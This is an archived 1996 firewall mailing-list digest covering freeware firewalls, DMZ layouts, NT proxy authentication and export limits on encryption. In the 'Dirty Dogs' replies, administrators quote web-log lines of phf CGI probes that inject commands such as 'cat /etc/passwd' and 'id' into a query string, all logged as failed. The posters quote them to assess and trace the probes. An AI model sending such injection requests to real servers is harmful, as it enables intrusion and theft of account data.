X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll <9607111219.AA25794@eo.ray.com> > Well, folks, whether or not you try to contact genstar.net or zilker.net > is > one issue, but I would definately do SOMETHING, at least on your own > systems. > Both of these log snippets indicate a SUCCESSFUL use of this attack. > Especially > now that you've published your vulnerability to the world, I hope you're > disabling the script! Not necessarily. Those look similar to the log files on our server, however if one looks at the corresponding errors file (for the Netscape server) one will notice error messages regarding the access and how the file could not be found. b. -- Brian J. Murrell Brian_Murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5279 From firewalls-owner Thu Jul 11 11:05:47 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA07663 for firewalls-outgoing; Thu, 11 Jul 1996 10:37:39 -0700 (PDT) Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id KAA07631 for ; Thu, 11 Jul 1996 10:37:28 -0700 (PDT) From: Don_Tompkins@esd.tracor.com Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) Received: from ccMail by esd.tracor.com Mime-Version: 1.0 Date: Thu, 11 Jul 1996 13:35:41 -0400 Message-Id: <1e53be30@esd.tracor.com> Subject: Re: Freeware To: firewalls@GreatCircle.COM, "Joseph M. Flahiff" Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Have tended to use commercial products for security applications. But have used freeware with good results on other projects including some with demanding requirements. A general comment: Freeware, shareware, and commercial ware are just different methods of providing products. Quality of product has more to do with factors such as the author(s) and design methods and tools than it does with distribution method. More formal or rigorous methods are important with security products and other critical hardware and software. Beyond the philosophy, availability for specific applications can also depend on resources and interest within government, academia, and industry. ______________________________ Reply Separator _________________________________ Subject: Freeware Author: "Joseph M. Flahiff" at ESD Date: 7/11/96 9:07 AM What are people's experiences with freeware products for firewalling, proxy, etc. ? Good, bad, dangerous? TIA Joseph Flahiff Moss Bay Group, Inc. Advisors in Technology Management From firewalls-owner Thu Jul 11 11:12:58 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id KAA09404 for firewalls-outgoing; Thu, 11 Jul 1996 10:53:18 -0700 (PDT) Received: from igubu.saix.co.za (igubu.saix.net [196.25.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id KAA09395 for ; Thu, 11 Jul 1996 10:53:05 -0700 (PDT) Received: from afjhb1exch1.aforbes.co.za Received: by afjhb1exch1.aforbes.co.za with Microsoft Exchange (IMC 4.0.837.3) Message-ID: From: Shepherd Rudie To: "'firewalls@greatcircle.com'" Subject: Catapult and user authentication Date: Thu, 11 Jul 1996 19:52:19 +0200 X-Mailer: Microsoft Exchange Server Internet Mail Connector Version 4.0.837.3 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk We are busy playing with Microsoft Catapult on a NT 4.0 beta 2 box. When I add some users to the WWW service, the proxy returns an error (on the browser). If I set access rights to Everybody, it works fine but with obvious limitations. The "Active Connections" window states that all users are connecting as "anonymous" (thus the Everybody setting). What's going on here? Where's the fancy NT authentication like in Information Server? Another thing... Is there something like the FWTK plug-gw for NT to plug mail and news? Any help greatly appreciated. Rudie From firewalls-owner Thu Jul 11 11:41:36 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA10131 for firewalls-outgoing; Thu, 11 Jul 1996 11:05:23 -0700 (PDT) Received: from norway.it.earthlink.net (norway-f.it.earthlink.net [206.85.92.49]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA10114 for ; Thu, 11 Jul 1996 11:05:14 -0700 (PDT) Received: from default (pool035.Max1.St-Louis.MO.DYNIP.ALTER.NET [153.37.140.35]) by norway.it.earthlink.net (8.7.5/8.7.3) with SMTP id NAA26498 for ; Thu, 11 Jul 1996 13:59:25 -0400 (EDT) Message-Id: <2.2.32.19960711180903.0068ef80@earthlink.net> X-Sender: jminie@earthlink.net X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 13:09:03 -0500 To: firewalls@GreatCircle.com From: Jim Minie Subject: RE: CISCO network level encryption & key lengths Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >> >> If the answer to the above are all "no" then does anyone have any alternative >> product suggestions - that fall in line with the network level encryption >> CISCO are producing ? > >Rumor alert! I once heard there are Japanese companies selling library >implementations of DES, 3-DES, etc. A company such as Cisco could conceivably >start an offshore company, obtain the outside encryption s/w (why rewrite it), >and sell their new router to non-US customers. Some interoperability testing >might be a problem (on the encryption side) with the US product, but it should >work. Note, I'm not endorsing this, just making a comment. End rumor alert. > >-- >chris > Canadian companies whose encryption methodologies can't be regulated by the U.S. State Department are doing a brisk business within the U.S. and maintaining that level of security throughout the world. I.e. Nortel Entrust. Maybe not falling in line with Cisco, but an alternate... Have you considered Virtual Private Networking via a firewall system to create the distinct user groups? It's just an idea. If you're talking individual users the cost would be way out of line. From firewalls-owner Thu Jul 11 11:50:10 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA11801 for firewalls-outgoing; Thu, 11 Jul 1996 11:34:29 -0700 (PDT) Received: from norway.it.earthlink.net (norway-f.it.earthlink.net [206.85.92.49]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id LAA11793 for ; Thu, 11 Jul 1996 11:34:21 -0700 (PDT) Received: from default (pool035.Max1.St-Louis.MO.DYNIP.ALTER.NET [153.37.140.35]) by norway.it.earthlink.net (8.7.5/8.7.3) with SMTP id OAA28879 for ; Thu, 11 Jul 1996 14:28:29 -0400 (EDT) Message-Id: <2.2.32.19960711183808.006b273c@earthlink.net> X-Sender: jminie@earthlink.net X-Mailer: Windows Eudora Pro Version 2.2 (32) Mime-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Date: Thu, 11 Jul 1996 13:38:08 -0500 To: firewalls@greatcircle.com From: Jim Minie Subject: Re: Freeware Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Would you attempt to build your own virus software based on the knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall commpany who maintains this knowledge and passes updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains. At 09:07 AM 7/11/96 -0700, you wrote: >What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? > >TIA > >Joseph Flahiff >Moss Bay Group, Inc. >Advisors in Technology Management > > > ________________________________________________________________ Jim Minie Network Systems Engineer Milkyway Networks, Inc. phone: (314) 275-4499 12400 Olive Blvd. Suite 555 fax: (314) 523-4554 St. Louis, MO 63141-5439 e-mail: jminie@milkyway.com "Nothing gets out of the Milkyway Black Hole Firewall" ________________________________________________________________ From firewalls-owner Thu Jul 11 12:06:15 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id LAA14288 for firewalls-outgoing; Thu, 11 Jul 1996 11:58:43 -0700 (PDT) Received: from tcs01.twentieth-century.com (tcs01.twentieth-century.com [207.19.50.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id LAA14277 for ; Thu, 11 Jul 1996 11:58:36 -0700 (PDT) Received: by tcs01.twentieth-century.com; id NAA21466; Thu, 11 Jul 1996 13:51:33 -0500 Received: from unknown(10.101.60.1) by tcs01.twentieth-century.com via smap (V3.1) Received: from [10.101.100.8] by inetkc.twentieth-century.com (IBM OS/2 SENDMAIL VERSION 1.3.14/2.12um) id AA5925; Thu, 11 Jul 96 13:56:05 -0500 Message-Id: <31E56A6D.14A3@twentieth-century.com> Date: Thu, 11 Jul 1996 13:56:13 -0700 From: Shelly Nuessle Organization: Twentieth Century Services X-Mailer: Mozilla 2.02 (Win16; I) Mime-Version: 1.0 To: Firewalls@GreatCircle.COM Subject: Re: Web Server on DMZ References: <199607102032.NAA21108@miles.greatcircle.com> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Dave Wreski asks On Wed, 10 Jul 1996, Bob Konigsberg wrote: >> >> The job of the Corp-Firewall is to protect the company network, the >> job of the outer firewall is to protect the exposed servers. >> >> If necessary, the outer firewall can also be used as a backup corp >> firewall. Or better yet, to complement it by using a different >>technology >> which will help make your network harder to crack into. >What type of different technology do you recommend? This sounds >interesting, as this is how we currently implement our >firewalls/servers.. Well, we have ours dual homed, taking tcp/ip one way and netbui the other. And we have some additional application level stuff going on the WWW. ANd we are limiting services on the WWW server... Shelly From firewalls-owner Thu Jul 11 12:35:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id MAA18930 for firewalls-outgoing; Thu, 11 Jul 1996 12:31:40 -0700 (PDT) Received: from ihgw2.att.com (ihgw2.att.com [207.19.48.2]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id MAA18867 for ; Thu, 11 Jul 1996 12:31:12 -0700 (PDT) From: mdr@vodka.sse.att.com Received: from vodka.sse.att.com by ihig2.att.att.com (SMI-8.6/EMS-1.2 sol2) Message-Id: <199607111925.OAA25005@ihig2.att.att.com> Subject: Re: Web Server on DMZ To: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Date: Thu, 11 Jul 1996 15:30:38 -0400 (EDT) Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com In-Reply-To: <9607101802.AA02049@manzanita.DEV.3Com.COM.noname> from "Bob Konigsberg" at Jul 10, 96 11:02:56 am X-Mailer: ELM [version 2.4 PL23-upenn2.7] MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Content-Type: text/plain; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > > BobK wrote: > Yes, you can put the web server on your DMZ, but the real answer here > is to run TWO firewalls. > > Like so: > > --company net ---/Corp-Firewall/---DMZ w/servers---/outer firewall/ --Internet > A single triple-homed firewall can accomplish the same thing I think. --company net ---/Corp-Firewall/ --Internet | | servers Mark Riggins From firewalls-owner Thu Jul 11 13:19:52 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA26498 for firewalls-outgoing; Thu, 11 Jul 1996 13:07:34 -0700 (PDT) Received: from deanna.miranova.com (deanna.miranova.com [206.190.83.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id NAA26478 for ; Thu, 11 Jul 1996 13:07:22 -0700 (PDT) Received: (from steve@localhost) by deanna.miranova.com (8.7.5/8.6.9) id NAA23662; Thu, 11 Jul 1996 13:03:21 -0700 To: firewalls@greatcircle.com Subject: Re: Re[2]: Dirty dogs References: <199607111645.JAA16682@mocha.bctel.net> X-Url: http://www.miranova.com/%7Esteve/ Mail-Copies-To: never X-Face: #!T9!#9s-3o8)*uHlX{Ug[xW7E7Wr!*L46-OxqMu\xz23v|R9q}lH?cRS{rCNe^'[`^sr5" From: Steven L Baur In-Reply-To: Brian Murrell's message of Thu, 11 Jul 1996 09:45:48 -0700 (PDT) Mime-Version: 1.0 (generated by tm-edit 7.69) Content-Type: text/plain; charset=US-ASCII Date: 11 Jul 1996 13:03:19 -0700 Message-ID: Lines: 23 X-Mailer: Gnus v5.2.34/XEmacs 19.14 Sender: firewalls-owner@GreatCircle.COM Precedence: bulk >>>>> "Brian" == Brian Murrell writes: Brian> from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll >> Both of these log snippets indicate a SUCCESSFUL use of this attack. Brian> Not necessarily. Those look similar to the log files on our server, Brian> however if one looks at the corresponding errors file (for the Netscape Brian> server) one will notice error messages regarding the access and how the Brian> file could not be found. Unsuccessful references should show a result code in the 400s and no bytes sent. unix.sbu.ac.uk - - [06/Jun/1996:01:30:41 -0700] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Apwd%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 404 - nor-va3-12.ix.netcom.com - - [13/Jun/1996:19:56:48 -0700] "GET /cgi-bin/phf?Qname=root%0Acat%20/etc/passwd HTTP/1.0" 404 - annex058.ridgecrest.ca.us - - [14/Jun/1996:14:43:13 -0700] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Aid%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 404 - -- steve@miranova.com baur Unsolicited commercial e-mail will be proofread for $250/hour. Andrea Seastrand: For your vote on the Telecom bill, I will vote for anyone except you in November. From firewalls-owner Thu Jul 11 13:34:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA28364 for firewalls-outgoing; Thu, 11 Jul 1996 13:29:38 -0700 (PDT) Received: from grumpy.mossbaygroup.com (mossbgrp.mossbaygrp.com [206.213.65.153]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA28356 for ; Thu, 11 Jul 1996 13:29:21 -0700 (PDT) Received: from [206.213.85.33] by grumpy.mossbaygroup.com (NTMail 3.01.03) id da000081; Thu, 11 Jul 1996 13:25:25 -0700 Received: by JFlahiff.mossbaygroup.com with Microsoft Mail Message-ID: <01BB6F2C.6AE41FC0@JFlahiff.mossbaygroup.com> From: "Joseph M. Flahiff" To: "'Firewalls Listserv'" Subject: RE: Freeware Date: Thu, 11 Jul 1996 13:25:15 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" Content-Transfer-Encoding: quoted-printable X-Info: Evaluation version at grumpy.mossbaygroup.com X-Info: Moss Bay Group, Inc. Advisors In Technology Management Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ---------- From: Jim Minie[SMTP:jminie@milkyway.com] Sent: Thursday, July 11, 1996 11:38 AM To: firewalls@greatcircle.com Subject: Re: Freeware Would you attempt to build your own virus software based on the = knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create = your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall commpany who maintains this knowledge and passes = updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains. =20 Whoa! Sorry for asking! =20 Are you saying you have had a poor experience? I am not asking for = personal opinions. I am looking for anecdotes, stories, examples, you = know...experiences. Hence the wording of my question. "What are = people's _experiences_..." I feel the same way you do. But, I thought, = "It is a big world and maybe there is something I don't know about." =20 I was not talking about creating firewall software myself. But someone = somewhere has to write the stuff. Who is to say that there is not some = group of benevolent geniuses out there somewhere, fighting for right and = doing it just because it is right not because they can make a buck doing = it. At 09:07 AM 7/11/96 -0700, you wrote: >What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? > >TIA > >Joseph Flahiff >Moss Bay Group, Inc. >Advisors in Technology Management From firewalls-owner Thu Jul 11 13:50:03 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA27285 for firewalls-outgoing; Thu, 11 Jul 1996 13:15:54 -0700 (PDT) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA27232 for ; Thu, 11 Jul 1996 13:15:30 -0700 (PDT) Received: from anubis.network.com by nsco.network.com (4.1/1.34) Received: from speedy.network.com by anubis.network.com (4.1/SMI-4.1) From: johnstm@anubis.network.com (Tony M Johnson) Message-Id: <9607112015.AA27387@anubis.network.com> Subject: RE: CISCO network level encryption & key lengths To: firewalls@greatcircle.com Date: Thu, 11 Jul 1996 15:15:48 -0500 (CDT) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ==================================================================== Tony Johnson Email: johnstm@anubis.network.com Network Systems Voice: (612) 391-1176 7600 Boone Avenue North Fax : (612) 424-2853 Minneapolis, MN 55428 ==================================================================== X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1575 >>If the answer to the above are all "no" then does anyone have any alternative >> product suggestions - that fall in line with the network level encryption >> CISCO are producing ? **NSC is in the network security business. We provide industrial-strength crypto for organiations regaless of their location. Granted, governments put restrictions on exporting/importing strong crypto, but it is far from being impossible to do. The issue is that in order to ship crypto stonger than 40 bits, one needs to have approval from the US state department (a US perspective). The approval is given based on the destined country and the end user. For example, we have shipped 56 bit DES to UK-owned companies numerous times. We have actually shipped IDEA (a 128 bit cypher) abroad. **Will the US relax is restrictions? Time will tell. There's much pressure from the security vendors toward this end. Will it happen? Probably. Will it happen this year? Probably not. **From a crypto perspective, Cisco is about 2 years behind the industry leaders in network security. I encourage you to give a look at NSC's BorderGuard familty of secure VPN products, emphasizing strong crypto from a company that has exported it to countries all over the world. (Of course, getting strong crypto into ex-Soviet nations and into N. Korea and PRC is not a simple process, though it is doable.) **Check us out: http://www.network.com **NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in Ascot are in the process of moving to Working. **Cheers From firewalls-owner Thu Jul 11 13:54:32 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA27425 for firewalls-outgoing; Thu, 11 Jul 1996 13:19:08 -0700 (PDT) Received: from gatekeeper.3Com.COM (gatekeeper.3Com.COM [129.213.128.5]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA27407 for ; Thu, 11 Jul 1996 13:18:58 -0700 (PDT) Received: from manzanita.DEV.3Com.COM.noname (manzanita.DEV.3Com.COM) by gatekeeper.3Com.COM with SMTP id AA06944 Received: by manzanita.DEV.3Com.COM.noname (4.1/SMI-4.1) Date: Thu, 11 Jul 96 13:14:28 PDT From: bobk@manzanita.DEV.3Com.COM (Bob Konigsberg) Message-Id: <9607112014.AA02607@manzanita.DEV.3Com.COM.noname> To: bobk@manzanita.DEV.3Com.COM, mdr@vodka.sse.att.com Subject: Re: Web Server on DMZ Cc: Firewalls@GreatCircle.COM, ggh14854@ussun2f.glaxo.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I'm not disagreeing about any of the points many of you have made concerning whether or not one box can handle the need for protecting the company network vs. protecting the DMZ machines. My points are that: 1) Unless you can keep a hot spare of your firewall equipment and configurations, you might be better off with two different systems that can be configured to back up each other in case of failure. 2) To protect your company network, you might seriously consider running your traffic through TWO different firewalls (utilizing different technology) in case someone breaks through one of the firewalls. There are people on this list who run their traffic through 3 different firewalls each of different technology. This is a little extreme for me, but then I don't know what their specific needs for both security and connectivity. One example that comes to mind is to use a simple firewall (such as a filtering router) to protect a proxy server or series of application servers to protect those servers themselves from compromise. In addition, a filtering router is generally better against a spoofing attack. Since the source address is masqerading as your own, it doesn't do any good to log those entries anyway. This is a fun conversation folks, BobK From firewalls-owner Thu Jul 11 14:13:25 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id NAA27392 for firewalls-outgoing; Thu, 11 Jul 1996 13:17:40 -0700 (PDT) Received: from nsco.network.com (nsco.network.com [129.191.1.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id NAA27381 for ; Thu, 11 Jul 1996 13:17:26 -0700 (PDT) Received: from anubis.network.com by nsco.network.com (4.1/1.34) Received: from speedy.network.com by anubis.network.com (4.1/SMI-4.1) From: johnstm@anubis.network.com (Tony M Johnson) Message-Id: <9607112017.AA27522@anubis.network.com> Subject: RE: CISCO network level encryption & key lengths To: firewalls@greatcircle.com Date: Thu, 11 Jul 1996 15:17:55 -0500 (CDT) Sender: firewalls-owner@GreatCircle.COM Precedence: bulk ==================================================================== Tony Johnson Email: johnstm@anubis.network.com Network Systems Voice: (612) 391-1176 7600 Boone Avenue North Fax : (612) 424-2853 Minneapolis, MN 55428 ==================================================================== X-Mailer: ELM [version 2.4 PL21] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Length: 1579 >> If the answer to the above are all "no" then does anyone have any alternative >> product suggestions - that fall in line with the network level encryption >> CISCO are producing ? >> **NSC is in the network security business. We provide industrial-strength crypto for organiations regaless of their location. Granted, governments put restrictions on exporting/importing strong crypto, but it is far from being impossible to do. The issue is that in order to ship crypto stonger than 40 bits, one needs to have approval from the US state department (a US perspective). The approval is given based on the destined country and the end user. For example, we have shipped 56 bit DES to UK-owned companies numerous times. We have actually shipped IDEA (a 128 bit cypher) abroad. **Will the US relax is restrictions? Time will tell. There's much pressure from the security vendors toward this end. Will it happen? Probably. Will it happen this year? Probably not. **From a crypto perspective, Cisco is about 2 years behind the industry leaders in network security. I encourage you to give a look at NSC's BorderGuard familty of secure VPN products, emphasizing strong crypto from a company that has exported it to countries all over the world. (Of course, getting strong crypto into ex-Soviet nations and into N. Korea and PRC is not a simple process, though it is doable.) **Check us out: http://www.network.com **NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in Ascot are in the process of moving to Working. **Cheers From firewalls-owner Thu Jul 11 15:49:46 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id PAA09754 for firewalls-outgoing; Thu, 11 Jul 1996 15:42:55 -0700 (PDT) Received: from gatekeeper.vitro.com (gatekeeper.vitro.com [149.32.254.1]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id PAA09747 for ; Thu, 11 Jul 1996 15:42:47 -0700 (PDT) From: Don_Tompkins@esd.tracor.com Received: by gatekeeper.vitro.com (5.65/DEC-Ultrix/4.3) Received: from esd.vitro.com(131.189.79.30) by gatekeeper.vitro.com via smap (V1.3) Received: from ccMail by esd.tracor.com Mime-Version: 1.0 Date: Thu, 11 Jul 1996 18:40:29 -0400 Message-Id: <1e5835e0@esd.tracor.com> Subject: Re[2]: Freeware - resent note To: "Joseph M. Flahiff" , firewalls@greatcircle.com Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Content-Description: cc:Mail note part Sender: firewalls-owner@GreatCircle.COM Precedence: bulk This may duplicate a response to your earlier question. Some very competent software engineering folks write freeware. Risks are always associated with any product since it is nearly impossible to test and evaluate completely. "When am I done testing" is a non-trivial issue in any system with more than a very small set of combinations and permutations. ... don Author: Mailer-Daemon@mhhaa.compuserve.com at ESD Returned mail TO: Don Tompkins at TRACOR_ESD ------------------------------- Message Contents ------------------------------- To: firewalls , "joseph m. flahiff" bcc: "patrick j. beskar" From: Don_Tompkins Date: 11 Jul 96 13:35:41 Subject: Re: Freeware MIME-Version: 1.0 Content-Type: Text/Plain Have tended to use commercial products for security applications. But have used freeware with good results on other projects including some with demanding requirements. A general comment: Freeware, shareware, and commercial ware are just different methods of providing products. Quality of product has more to do with factors such as the author(s) and design methods and tools than it does with distribution method. More formal or rigorous methods are important with security products and other critical hardware and software. Beyond the philosophy, availability for specific applications can also depend on resources and interest within government, academia, and industry. ______________________________ Reply Separator _________________________________ Subject: Freeware Author: "Joseph M. Flahiff" at ESD Date: 7/11/96 9:07 AM What are people's experiences with freeware products for firewalling, proxy, etc. ? Good, bad, dangerous? TIA Joseph Flahiff Moss Bay Group, Inc. Advisors in Technology Management ---- message ------ _____________________________ Reply Separator _________________________________ Subject: RE: Freeware Author: "Joseph M. Flahiff" at ESD Date: 7/11/96 1:25 PM ---------- From: Jim Minie[SMTP:jminie@milkyway.com] Sent: Thursday, July 11, 1996 11:38 AM To: firewalls@greatcircle.com Subject: Re: Freeware Would you attempt to build your own virus software based on the knowledge that you've 'seen a few virii in your time'? There are more ways around most firewalls than is ever discussed in this group. IMHO, to create your own firewall without continual knowledge of what new attacks are being created almost daily is an act of network suicide... Getting in with a reputable firewall commpany who maintains this knowledge and passes updates along is very similar to quality virus companies who provide constant updates to their product addressing new strains. Whoa! Sorry for asking! Are you saying you have had a poor experience? I am not asking for personal opin ions. I am looking for anecdotes, stories, examples, you know...experiences. Hen ce the wording of my question. "What are people's _experiences_..." I feel the s ame way you do. But, I thought, "It is a big world and maybe there is something I don't know about." I was not talking about creating firewall software myself. But someone somewhere has to write the stuff. Who is to say that there is not some group of benevolen t geniuses out there somewhere, fighting for right and doing it just because it i s right not because they can make a buck doing it. At 09:07 AM 7/11/96 -0700, you wrote: >What are people's experiences with freeware products for firewalling, proxy, etc.? Good, bad, dangerous? > >TIA > >Joseph Flahiff >Moss Bay Group, Inc. >Advisors in Technology Management From firewalls-owner Thu Jul 11 16:49:39 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id QAA13044 for firewalls-outgoing; Thu, 11 Jul 1996 16:40:38 -0700 (PDT) Received: from tera.bctel.net (tera.bctel.net [204.174.64.252]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with ESMTP id QAA13028 for ; Thu, 11 Jul 1996 16:40:27 -0700 (PDT) Received: (from nobody@localhost) by tera.bctel.net (8.7.4/8.7.1) id QAA06529; Thu, 11 Jul 1996 16:31:26 -0700 (PDT) Received: from mocha.bctel.net(204.174.66.5) by tera via smap (V1.3) Received: (from murrell@localhost) by mocha.bctel.net (8.7.5/8.7.3) id QAA17619; Thu, 11 Jul 1996 16:37:27 -0700 (PDT) From: Brian Murrell Message-Id: <199607112337.QAA17619@mocha.bctel.net> Date: Thu, 11 Jul 1996 16:37:26 -0700 (PDT) To: johnstm@anubis.network.com Cc: firewalls@GreatCircle.COM Subject: RE[2]: CISCO network level encryption & key lengths In-Reply-To: <9607112015.AA27387@anubis.network.com> X-Mailer: Ishmail 1.2.2-960610-sol24 MIME-Version: 1.0 Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of johnstm@anubis.network.com (Tony M Johnson) on scroll <9607112015.AA27387@anubis.network.com> > **NSC is owned by Storage Tec; UK main offices in Woking; NSC-offices in > Ascot are in the process of moving to Working. Maybe if enough business left the US to be able to deal encryption without being hindered by draconian governments, the US might smarten up. If some of you are tired of reality you might want to join me here in wonderland. :-) b. -- Brian J. Murrell Brian_Murrell@bctel.net BCTel Advanced Communications brian@ilinx.com Vancouver, B.C. brian@wimsey.com 604 454 5279 From firewalls-owner Thu Jul 11 18:37:14 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA18917 for firewalls-outgoing; Thu, 11 Jul 1996 18:28:21 -0700 (PDT) Received: from omsk.yourtown.com (omsk.yourtown.com [205.246.66.7]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA18910 for ; Thu, 11 Jul 1996 18:28:14 -0700 (PDT) Received: by omsk.yourtown.com (4.1/SMI-4.1) Date: Thu, 11 Jul 96 20:22:55 EDT From: bve@omsk.yourtown.com (BVE) Message-Id: <9607120022.AA13435@omsk.yourtown.com> To: firewalls@greatcircle.com Subject: Re: Dirty Dogs Sender: firewalls-owner@GreatCircle.COM Precedence: bulk from the quill of hhantman@eo.ray.com (Howard Hantman) on scroll <9607111219.AA25794@eo.ray.com> >> Well, folks, whether or not you try to contact genstar.net or zilker.net >> is >> one issue, but I would definately do SOMETHING, at least on your own >> systems. >> Both of these log snippets indicate a SUCCESSFUL use of this attack. >> Especially >> now that you've published your vulnerability to the world, I hope you're >> disabling the script! > >From: Brian Murrell > >Not necessarily. Those look similar to the log files on our server, >however if one looks at the corresponding errors file (for the Netscape >server) one will notice error messages regarding the access and how the >file could not be found. Brian is correct. The access logs of the WWW servers I've used log all attempts, whether or not they are successful. We also were probed: 152.169.232.79 - - [03/Jul/1996:17:09:06 -0400] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 404 - This attempt failed, as we did not have a phf CGI script. Interestingly, here is the whois: > whois -h rs.internic.net 152.169.232.0 No match for "152.169.232.0". The InterNIC Registration Services Host contains ONLY Internet Information (Networks, ASN's, Domains, and POC's). Please use the whois server at nic.ddn.mil for MILNET Information. ...and: > whois 152.169.232.0 No match for "152.169.232.0". Please be advised that this whois server only contains DOD Information. All INTERNET Domain, IP Network Number, and ASN records are kept in the Internet Registry, RS.INTERNIC.NET. ...and nslookup: > nslookup 152.169.232.79 Server: omsk.yourtown.com Address: 205.246.66.7 Name: [152.169.232.79] Address: 152.169.232.79 ----------------------------- This person seems to have covered their tracks pretty well. Any ideas on tracking them?? Bill Van Emburg Quadrix Solutions, Inc. (bve@quadrix.com) (http://yourtown.com) "You do what you want, and if you didn't, you don't" From firewalls-owner Thu Jul 11 18:49:42 1996 Received: (majordom@localhost) by miles.greatcircle.com (8.7.1-lists/Lists-960417-1) id SAA19012 for firewalls-outgoing; Thu, 11 Jul 1996 18:33:56 -0700 (PDT) Received: from homeport.org (lighthouse.homeport.org [205.136.65.198]) by miles.greatcircle.com (8.7.4/Miles-951221-1) with SMTP id SAA19005 for ; Thu, 11 Jul 1996 18:33:48 -0700 (PDT) Received: (adam@localhost) by homeport.org (8.6.9/8.6.9) id VAA13959; Thu, 11 Jul 1996 21:36:43 -0500 From: Adam Shostack Message-Id: <199607120236.VAA13959@homeport.org> Subject: Re: CISCO network level encryption & key lengths To: ckostick@csc.com (Chris Kostick) Date: Thu, 11 Jul 1996 21:36:42 -0500 (EST) Cc: 